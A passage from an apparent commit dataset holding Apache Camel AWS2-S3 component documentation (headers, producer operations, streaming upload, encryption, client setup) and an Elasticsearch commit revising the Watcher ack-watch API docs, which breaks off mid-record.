object.\n\n|`CamelAwsS3ContentControl` |`String` |The content control of this object.\n\n|`CamelAwsS3ContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelAwsS3ContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelAwsS3ContentMD5` |`String` |The md5 checksum of this object.\n\n|`CamelAwsS3DestinationKey` |`String` |The Destination key which will be used for the current operation\n\n|`CamelAwsS3Key` |`String` |The key under which this object will be stored or which will be used for the current operation\n\n|`CamelAwsS3LastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelAwsS3Operation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, listBuckets, deleteBucket, listObjects\n\n|`CamelAwsS3StorageClass` |`String` |The storage class of this object.\n\n|`CamelAwsS3CannedAcl` |`String` |The canned acl that will be applied to the object. see\n`software.amazon.awssdk.services.s3.model.ObjectCannedACL` for allowed\nvalues.\n\n|`CamelAwsS3Acl` |`software.amazon.awssdk.services.s3.model.BucketCannedACL` |A well constructed Amazon S3 Access Control List object.\nsee `software.amazon.awssdk.services.s3.model.BucketCannedACL` for more details\n\n|`CamelAwsS3Headers` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelAwsS3ServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using AWS-managed keys. For example use AES256.\n\n|`CamelAwsS3VersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|`CamelAwsS3Metadata` |`Map<String, String>` |A map of metadata stored with the object in S3.\n|=======================================================================\n\n=== Message headers set by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelAwsS3ETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelAwsS3VersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\n|=======================================================================\n\n=== Message headers set by the S3 consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3Key` |`String` |The key under which this object is stored.\n\n|`CamelAwsS3BucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelAwsS3ETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Amazon S3.\n\n|`CamelAwsS3LastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Amazon S3 last recorded a modification to the associated object.\n\n|`CamelAwsS3VersionId` |`String` |The version ID of the associated Amazon S3 object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Amazon\nS3 bucket that has object versioning enabled.\n\n|`CamelAwsS3ContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelAwsS3ContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. This data is used as a\nmessage integrity check to verify that the data received by Amazon S3 is\nthe same data that the caller sent.\n\n|`CamelAwsS3ContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelAwsS3ContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelAwsS3ContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelAwsS3ContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelAwsS3ServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using AWS-managed keys.\n|=======================================================================\n\n=== S3 Producer operations\n\nCamel-AWS2-S3 component provides the following operation on the producer side:\n\n- copyObject\n- deleteObject\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return an S3Object instance)\n- getObjectRange (this will return an S3Object instance)\n- createDownloadLink\n\nIf you don't specify an operation explicitly the producer will do:\n- a single file upload\n- a multipart upload if multiPartUpload option is enabled\n\n=== Advanced AmazonS3 configuration\n\nIf your Camel Application is running behind a firewall or if you need to\nhave more control over the `S3Client` instance configuration, you can\ncreate your own instance and refer to it in your Camel aws2-s3 component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/MyBucket?amazonS3Client=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n=== Use KMS with the S3 component\n\nTo use AWS KMS to encrypt\/decrypt data by using AWS infrastructure you can use the options introduced in 2.21.x like in the following example\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"file:tmp\/test?fileName=test.txt\")\n .setHeader(S3Constants.KEY, constant(\"testFile\"))\n .to(\"aws2-s3:\/\/mybucket?amazonS3Client=#client&useAwsKMS=true&awsKMSKeyId=3f0637ad-296a-3dfe-a796-e60654fb128c\");\n--------------------------------------------------------------------------------\n\nIn this way you'll ask to S3, to use the KMS key 3f0637ad-296a-3dfe-a796-e60654fb128c, to encrypt the file test.txt. When you'll ask to download this file, the decryption will be done directly before the download.\n\n=== Static credentials vs Default Credential Provider\n\nYou have the possibility of avoiding the usage of explicit static credentials, by specifying the useDefaultCredentialsProvider option and set it to true.\n\n - Java system properties - aws.accessKeyId and aws.secretKey\n - Environment variables - AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.\n - Web Identity Token from AWS STS.\n - The shared credentials and config files.\n - Amazon ECS container credentials - loaded from the Amazon ECS if the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is set.\n - Amazon EC2 Instance profile credentials. \n\nFor more information about this you can look at https:\/\/docs.aws.amazon.com\/sdk-for-java\/latest\/developer-guide\/credentials.html[AWS credentials documentation]\n\n=== S3 Producer Operation examples\n\n- Single Upload: This operation will upload a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camel.txt\");\n exchange.getIn().setBody(\"Camel rocks!\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will upload the file camel.txt with the content \"Camel rocks!\" in the mycamelbucket bucket\n\n- Multipart Upload: This operation will perform a multipart upload of a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"empty.txt\");\n exchange.getIn().setBody(new File(\"src\/empty.txt\"));\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&multiPartUpload=true&autoCreateBucket=true&partSize=1048576\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will perform a multipart upload of the file empty.txt with based on the content the file src\/empty.txt in the mycamelbucket bucket\n\n- CopyObject: this operation copy an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.BUCKET_DESTINATION_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(S3Constants.DESTINATION_KEY, \"camelDestinationKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object with the name expressed in the header camelDestinationKey to the camelDestinationBucket bucket, from the bucket mycamelbucket.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation list the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the buckets for this account\n\n- DeleteBucket: this operation delete the bucket specified as URI parameter or header\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteBucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the bucket mycamelbucket\n\n- ListObjects: this operation list object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listObjects\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will list the objects in the mycamelbucket bucket\n\n- GetObject: this operation get a single object in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in mycamelbucket bucket.\n\n- GetObjectRange: this operation get a single object range in a specific bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(S3Constants.RANGE_START, \"0\");\n exchange.getIn().setHeader(S3Constants.RANGE_END, \"9\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=getObjectRange\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return an S3Object instance related to the camelKey object in mycamelbucket bucket, containing a the bytes from 0 to 9.\n\n- CreateDownloadLink: this operation will return a download link through S3 Presigner\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?accessKey=xxx&secretKey=yyy®ion=region&operation=createDownloadLink\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will return a download link url for the file camel-key in the bucket mycamelbucket and region region\n\n== Streaming Upload mode\n\nWith the stream mode enabled users will be able to upload data to S3 without knowing ahead of time the dimension of the data, by leveraging multipart upload.\nThe upload will be completed when: the batchSize has been completed or the batchMessageNumber has been reached.\nThere are two possible naming strategy: progressive and random. With the progressive strategy each file will have the name composed by keyName option and a progressive counter, and eventually the file extension (if any), while with the random strategy a UUID will be added after keyName and eventually the file extension will appended.\n\nAs an example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(kafka(\"topic1\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic1}}\/{{kafkaTopic1}}.txt\"));\n\nfrom(kafka(\"topic2\").brokers(\"localhost:9092\"))\n .log(\"Kafka Message is: ${body}\")\n .to(aws2S3(\"camel-bucket\").streamingUploadMode(true).batchMessageNumber(25).namingStrategy(AWS2S3EndpointBuilderFactory.AWSS3NamingStrategyEnum.progressive).keyName(\"{{kafkaTopic2}}\/{{kafkaTopic2}}.txt\"));\n--------------------------------------------------------------------------------\n\nThe default size for a batch is 1 Mb, but you can adjust it according to your requirements.\n\nWhen you'll stop your producer route, the producer will take care of flushing the remaining buffered messaged and complete the upload.\n\nIn Streaming upload you'll be able restart the producer from the point where it left. It's important to note that this feature is critical only when using the progressive naming strategy.\n\nBy setting the restartingPolicy to lastPart, you will restart uploading files and contents from the last part number the producer left.\n\nAs example: \n- Start the route with progressive naming strategy and keyname equals to camel.txt, with batchMessageNumber equals to 20, and restartingPolicy equals to lastPart\n- Send 70 messages.\n- Stop the route\n- On your S3 bucket you should now see 4 files: camel.txt, camel-1.txt, camel-2.txt and camel-3.txt, the first three will have 20 messages, while the last one only 10.\n- Restart the route\n- Send 25 messages\n- Stop the route\n- You'll now have 2 other files in your bucket: camel-5.txt and camel-6.txt, the first with 20 messages and second with 5 messages.\n- Go ahead\n\nThis won't be needed when using the random naming strategy.\n\nOn the opposite you can specify the override restartingPolicy. In that case you'll be able to override whatever you written before (for that particular keyName) on your bucket.\n\n[NOTE]\n====\nIn Streaming upload mode the only keyName option that will be taken into account is the endpoint option. Using the header will throw an NPE and this is done by design.\nSetting the header means potentially change the file name on each exchange and this is against the aim of the streaming upload producer. The keyName needs to be fixed and static. \nThe selected naming strategy will do the rest of the of the work.\n====\n\n== Bucket Autocreation\n\nWith the option `autoCreateBucket` users are able to avoid the autocreation of an S3 Bucket in case it doesn't exist. The default for this option is `true`.\nIf set to false any operation on a not-existent bucket in AWS won't be successful and an error will be returned.\n\n== Moving stuff between a bucket and another bucket\n\nSome users like to consume stuff from a bucket and move the content in a different one without using the copyObject feature of this component.\nIf this is case for you, don't forget to remove the bucketName header from the incoming exchange of the consumer, otherwise the file will be always overwritten on the same\noriginal bucket.\n\n== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead it has been added another option, moveAfterRead. With this option enabled the consumed object will be moved to a target destinationBucket instead of being only deleted.\nThis will require specifying the destinationBucket option. As example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\nYou have also the possibility of using a key prefix\/suffix while moving the file to a different bucket. The options are destinationBucketPrefix and destinationBucketSuffix.\n\nTaking the above example, you could do something like:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&moveAfterRead=true&destinationBucket=myothercamelbucket&destinationBucketPrefix=RAW(pre-)&destinationBucketSuffix=RAW(-suff)\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to myothercamelbucket bucket and deleted from the original one (because of deleteAfterRead set to true as default).\n\nSo if the file name is test, in the myothercamelbucket you should see a file called pre-test-suff.\n\n== Using customer key as encryption\n\nWe introduced also the customer key support (an alternative of using KMS). The following code shows an example.\n\n[source,java]\n--------------------------------------------------------------------------------\nString key = UUID.randomUUID().toString();\nbyte[] secretKey = generateSecretKey();\nString b64Key = Base64.getEncoder().encodeToString(secretKey);\nString b64KeyMd5 = Md5Utils.md5AsBase64(secretKey);\n\nString awsEndpoint = \"aws2-s3:\/\/mycamel?autoCreateBucket=false&useCustomerKey=true&customerKeyId=RAW(\" + b64Key + \")&customerKeyMD5=RAW(\" + b64KeyMd5 + \")&customerAlgorithm=\" + AES256.name();\n\nfrom(\"direct:putObject\")\n .setHeader(AWS2S3Constants.KEY, constant(\"test.txt\"))\n .setBody(constant(\"Test\"))\n .to(awsEndpoint);\n--------------------------------------------------------------------------------\n\n== Using a POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn AWS S3 there are multiple operations you can submit, as an example for List brokers request, you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:aws2-s3\")\n .setBody(ListObjectsRequest.builder().bucket(bucketName).build())\n .to(\"aws2-s3:\/\/test?amazonS3Client=#amazonS3Client&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Create S3 client and add component to registry\nSometimes you would want to perform some advanced configuration using AWS2S3Configuration which also allows to set the S3 client.\nYou can create and set the S3 client in the component configuration as shown in the following example\n\n[source,java]\n--------------------------------------------------------------------------------\nString awsBucketAccessKey = \"your_access_key\";\nString awsBucketSecretKey = \"your_secret_key\";\n\nS3Client s3Client = S3Client.builder().credentialsProvider(StaticCredentialsProvider.create(AwsBasicCredentials.create(awsBucketAccessKey, awsBucketSecretKey)))\n .region(Region.US_EAST_1).build();\n\nAWS2S3Configuration configuration = new AWS2S3Configuration();\nconfiguration.setAmazonS3Client(s3Client);\nconfiguration.setAutoDiscoverClient(true);\nconfiguration.setBucketName(\"s3bucket2020\");\nconfiguration.setRegion(\"us-east-1\");\n--------------------------------------------------------------------------------\n\nNow you can configure the S3 component (using the configuration object created above) and add it to the registry in the\nconfigure method before initialization of routes.\n\n[source,java]\n--------------------------------------------------------------------------------\nAWS2S3Component s3Component = new AWS2S3Component(getContext());\ns3Component.setConfiguration(configuration);\ns3Component.setLazyStartProducer(true);\ncamelContext.addComponent(\"aws2-s3\", s3Component);\n--------------------------------------------------------------------------------\n\nNow your component will be used for all the operations implemented in camel routes.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-s3<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version}` must be replaced by the actual version of Camel.\n\n\ninclude::{page-component-version}@camel-spring-boot::page$aws2-s3-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2188a175941b4b6b740c107cafa90cafb0e6c7","subject":"Reduce chance for test failure due to schedule (#56633)","message":"Reduce chance for test failure due to schedule (#56633)\n\nIf CI is running tests at exactly 0 or 5 minutes past the hour\r\nthe ack-watch docs tests may fail with a 409 error if the ack\r\ntest happens to run at the exact time that the schedule watch\r\nis running.\r\n\r\nThis commit changes the public documentation (and the test) for\r\nthe ack to a feb 29th at noon schedule. Test doc or tests do\r\nnot really care about the schedule date and this is chosen\r\nsince it is a valid date, but one that is extremely unlikely\r\nto cause issues.","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/rest-api\/watcher\/ack-watch.asciidoc","new_file":"x-pack\/docs\/en\/rest-api\/watcher\/ack-watch.asciidoc","new_contents":"[role=\"xpack\"]\n[[watcher-api-ack-watch]]\n=== Ack watch API\n++++\n<titleabbrev>Ack watch<\/titleabbrev>\n++++\n\n<<actions-ack-throttle,Acknowledging a watch>> enables you\nto manually throttle execution of the watch's actions.\n\n[[watcher-api-ack-watch-request]]\n==== {api-request-title}\n\n`PUT _watcher\/watch\/<watch_id>\/_ack` +\n\n`PUT _watcher\/watch\/<watch_id>\/_ack\/<action_id>`\n\n[[watcher-api-ack-watch-prereqs]]\n==== {api-prereq-title}\n\n* You must have `manage_watcher` cluster privileges to use this API. For more\ninformation, see <<security-privileges>>.\n\n[[watcher-api-ack-watch-desc]]\n==== {api-description-title}\n\nAn action's _acknowledgement state_ is stored in the\n`status.actions.<id>.ack.state` structure.\n\nIMPORTANT: If the specified watch is currently being executed, this API will\nreturn an error. The reason for this is to prevent overwriting of the watch\nstatus from a watch execution.\n\n[[watcher-api-ack-watch-path-params]]\n==== {api-path-parms-title}\n\n`<action_id>`::\n (Optional, list) A comma-separated list of the action IDs to acknowledge. If you omit\n this parameter, all of the actions of the watch are acknowledged.\n\n`<watch_id>`::\n (Required, string) Identifier for the watch.\n\n\/\/[[watcher-api-ack-watch-query-params]]\n\/\/==== {api-query-parms-title}\n\n\/\/[[watcher-api-ack-watch-request-body]]\n\/\/==== {api-request-body-title}\n\n\/\/[[watcher-api-ack-watch-response-body]]\n\/\/==== {api-response-body-title}\n\n\/\/[[watcher-api-ack-watch-response-codes]]\n\/\/==== {api-response-codes-title}\n\n[[watcher-api-ack-watch-example]]\n==== {api-examples-title}\n\nTo demonstrate let's create a new watch:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\n{\n \"trigger\" : {\n \"schedule\" : {\n \"yearly\" : { \"in\" : \"february\", \"on\" : 29, \"at\" : \"noon\" }\n }\n },\n \"input\": {\n \"simple\": {\n \"payload\": {\n \"send\": \"yes\"\n }\n }\n },\n \"condition\": {\n \"always\": {}\n },\n \"actions\": {\n \"test_index\": {\n \"throttle_period\": \"15m\",\n \"index\": {\n \"index\": \"test\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTSETUP\n\nThe current status of a watch and the state of its actions is returned with the\nwatch definition when you call the <<watcher-api-get-watch, Get Watch API>>:\n\n[source,console]\n--------------------------------------------------\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\nThe action state of a newly-created watch is `awaits_successful_execution`:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_seq_no\": 0,\n \"_primary_term\": 1,\n \"_version\": 1,\n \"_id\": \"my_watch\",\n \"status\": {\n \"version\": 1,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"awaits_successful_execution\"\n }\n }\n },\n \"state\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\nWhen the watch executes and the condition matches, the value of the `ack.state`\nchanges to `ackable`. Let's force execution of the watch and fetch it again to\ncheck the status:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_execute\n{\n \"record_execution\" : true\n}\n\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\nand the action is now in `ackable` state:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 1,\n \"_primary_term\": 1,\n \"_version\": 2,\n \"status\": {\n \"version\": 2,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"ackable\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nNow we can acknowledge it:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\/_ack\/test_index\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 2,\n \"_primary_term\": 1,\n \"_version\": 3,\n \"status\": {\n \"version\": 3,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nAcknowledging an action throttles further executions of that action until its\n`ack.state` is reset to `awaits_successful_execution`. This happens when the\ncondition of the watch is not met (the condition evaluates to `false`).\n\nYou can acknowledge multiple actions by assigning the `actions` parameter a\ncomma-separated list of action ids:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\/action1,action2\n--------------------------------------------------\n\nTo acknowledge all of the actions of a watch, simply omit the `actions`\nparameter:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\n--------------------------------------------------\n\/\/ TEST[s\/^\/POST _watcher\\\/watch\\\/my_watch\\\/_execute\\n{ \"record_execution\" : true }\\n\/]\n\n\nThe response looks like a get watch response, but only contains the status:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"status\": {\n \"state\": {\n \"active\": true,\n \"timestamp\": \"2015-05-26T18:04:27.723Z\"\n },\n \"last_checked\": \"2015-05-26T18:04:27.753Z\",\n \"last_met_condition\": \"2015-05-26T18:04:27.763Z\",\n \"actions\": {\n \"test_index\": {\n \"ack\" : {\n \"timestamp\": \"2015-05-26T18:04:27.713Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.733Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.773Z\",\n \"successful\": true\n }\n }\n },\n \"execution_state\": \"executed\",\n \"version\": 2\n }\n}\n\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"last_checked\": \"2015-05-26T18:04:27.753Z\"\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \"2015-05-26T18:04:27.763Z\"\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.state.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.713Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.733Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.773Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_successful_execution.timestamp\"\/]\n","old_contents":"[role=\"xpack\"]\n[[watcher-api-ack-watch]]\n=== Ack watch API\n++++\n<titleabbrev>Ack watch<\/titleabbrev>\n++++\n\n<<actions-ack-throttle,Acknowledging a watch>> enables you\nto manually throttle execution of the watch's actions.\n\n[[watcher-api-ack-watch-request]]\n==== {api-request-title}\n\n`PUT _watcher\/watch\/<watch_id>\/_ack` +\n\n`PUT 